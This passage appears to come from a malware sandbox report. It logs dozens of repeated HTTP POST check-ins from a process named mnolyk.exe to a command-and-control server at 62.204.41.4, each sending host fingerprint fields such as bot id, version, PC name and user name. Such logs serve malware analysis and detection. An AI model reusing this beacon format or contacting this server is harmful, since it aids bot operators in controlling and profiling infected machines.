Feb 7, 2023 20:01:53.041039944 CET	353	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:53.106280088 CET	353	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.6	49740	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:56.170996904 CET	127	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:56.234837055 CET	127	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
220	192.168.2.6	49942	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:53.287894011 CET	354	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:53.352664948 CET	354	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
221	192.168.2.6	49943	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:53.532964945 CET	355	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:53.595475912 CET	355	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
222	192.168.2.6	49944	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:53.792361975 CET	356	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:53.854832888 CET	356	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
223	192.168.2.6	49945	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:54.040738106 CET	357	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:54.107270002 CET	357	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
224	192.168.2.6	49946	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:54.317743063 CET	358	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:54.382225990 CET	358	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
225	192.168.2.6	49947	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:54.584701061 CET	359	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:54.649368048 CET	359	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
226	192.168.2.6	49948	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:54.830001116 CET	360	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:54.893845081 CET	360	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
227	192.168.2.6	49949	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:55.074451923 CET	361	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:55.140377045 CET	361	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
228	192.168.2.6	49950	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:55.313520908 CET	362	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:55.375415087 CET	362	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
229	192.168.2.6	49951	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:55.550312996 CET	363	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:55.615092993 CET	363	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.6	49741	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:56.423672915 CET	128	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:56.487675905 CET	128	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
230	192.168.2.6	49952	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:55.791186094 CET	364	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:55.854109049 CET	364	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
231	192.168.2.6	49953	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:56.032155037 CET	365	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:56.098236084 CET	365	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
232	192.168.2.6	49954	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:56.265158892 CET	366	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:56.327336073 CET	366	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
233	192.168.2.6	49955	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:56.500323057 CET	367	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:56.563816071 CET	367	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
234	192.168.2.6	49956	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:56.737292051 CET	368	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:56.802118063 CET	368	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
235	192.168.2.6	49957	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:56.989415884 CET	369	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:57.056065083 CET	369	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
236	192.168.2.6	49958	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:57.237616062 CET	370	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:57.307380915 CET	370	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
237	192.168.2.6	49959	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:57.490225077 CET	371	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:57.553457022 CET	371	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
238	192.168.2.6	49960	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:57.722505093 CET	372	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
